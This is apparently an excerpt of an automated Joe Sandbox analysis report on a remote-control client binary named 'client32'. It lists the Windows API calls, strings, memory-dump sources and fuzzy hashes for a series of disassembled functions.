  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
• GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
• GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
• String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
• API String ID: 1734919802-1728070458
• Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
• Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
• Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
• Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• std::exception::exception.LIBCMT ref: 11110E4A
• __CxxThrowException@8.LIBCMT ref: 11110E5F
• GetCurrentThreadId.KERNEL32 ref: 11110E76
• InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
• InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
• EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
• LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
• String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
• API String ID: 1976012330-1024648535
• Opcode ID: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
• Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
• Opcode Fuzzy Hash: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
• Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,1EF76653,00000000,?,00000000), ref: 110613A4
                                                                                                                                                    • _malloc.LIBCMT ref: 110613EB
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,1EF76653,00000000), ref: 1106142B
                                                                                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
                                                                                                                                                    • _free.LIBCMT ref: 110614A4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                                                                                    • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                                                                    • API String ID: 999355418-161875503
                                                                                                                                                    • Opcode ID: 2f8ee5cf0599d0cb1ab7719bd1c1ba46f0334f60211ecdc2d996a40dffef4bdf
                                                                                                                                                    • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                                                                                                    • Opcode Fuzzy Hash: 2f8ee5cf0599d0cb1ab7719bd1c1ba46f0334f60211ecdc2d996a40dffef4bdf
                                                                                                                                                    • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,1EF76653,00000000,?), ref: 1115C927
                                                                                                                                                    • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                                                                                                    • wsprintfW.USER32 ref: 1115C967
                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                                                                                                    • wsprintfW.USER32 ref: 1115CA27
                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                                                    • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                                                    • API String ID: 3050498177-823534439
                                                                                                                                                    • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                                                                    • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                                                                                                    • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                                                                    • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6CAA0F2B,1737DA36,00000000,?,?,6CABF278,000000FF,?,6CA8AE0A,?,00000000,?,00000080), ref: 6CAA0D48
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6CAA0D5B
                                                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6CACCB4C,?,?,6CABF278,000000FF,?,6CA8AE0A,?,00000000,?,00000080), ref: 6CAA0D76
                                                                                                                                                    • _malloc.LIBCMT ref: 6CAA0D8C
                                                                                                                                                      • Part of subcall function 6CAA1B69: __FF_MSGBANNER.LIBCMT ref: 6CAA1B82
                                                                                                                                                      • Part of subcall function 6CAA1B69: __NMSG_WRITE.LIBCMT ref: 6CAA1B89
                                                                                                                                                      • Part of subcall function 6CAA1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6CAAD3C1,6CAA6E81,00000001,6CAA6E81,?,6CAAF447,00000018,6CAC7738,0000000C,6CAAF4D7), ref: 6CAA1BAE
                                                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6CABF278,000000FF,?,6CA8AE0A,?,00000000,?), ref: 6CAA0D9F
                                                                                                                                                    • _free.LIBCMT ref: 6CAA0D84
                                                                                                                                                      • Part of subcall function 6CAA1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6CAA1C13
                                                                                                                                                      • Part of subcall function 6CAA1BFD: GetLastError.KERNEL32(00000000), ref: 6CAA1C25
                                                                                                                                                    • _free.LIBCMT ref: 6CAA0DAF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                                                                    • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                                                                    • API String ID: 1360380336-1843585929
                                                                                                                                                    • Opcode ID: b36a3f4dcca6a5a143f588c3089dc2a1ddc9e09759dcddf92965fb1c9ad7cae5
                                                                                                                                                    • Instruction ID: bcf8941c0a07c152159f4a514b04957f2fdef4b93a7ceadedb6276061d6a0713
                                                                                                                                                    • Opcode Fuzzy Hash: b36a3f4dcca6a5a143f588c3089dc2a1ddc9e09759dcddf92965fb1c9ad7cae5
                                                                                                                                                    • Instruction Fuzzy Hash: 5701ACB62013416FF63457B09C45F6777A8AF41704F14491CF596DFA80E671F486C764
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                                                                                      • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                                                                    • _memset.LIBCMT ref: 11146055
                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                                                    • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                                                                    • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                    • API String ID: 4251163631-545709139
                                                                                                                                                    • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                                                                                    • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                                                                                                    • Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                                                                                    • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                                                                                                    APIs
                                                                                                                                                    • wsprintfA.USER32 ref: 1101567A
                                                                                                                                                    • _memset.LIBCMT ref: 110156BE
                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                                                                                                    Strings
                                                                                                                                                    • NSLSP, xrefs: 11015708
                                                                                                                                                    • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                                                                                                    • %012d, xrefs: 11015674
                                                                                                                                                    • PackedCatalogItem, xrefs: 110156E2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue_memsetwsprintf
                                                                                                                                                    • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                                                    • API String ID: 1333399081-1346142259
                                                                                                                                                    • Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                                                                                    • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                                                                                                    • Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                                                                                    • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                                    • String ID: bad cast
                                                                                                                                                    • API String ID: 2427920155-3145022300
                                                                                                                                                    • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                                                                                    • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                                                                                                    • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                                                                                    • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
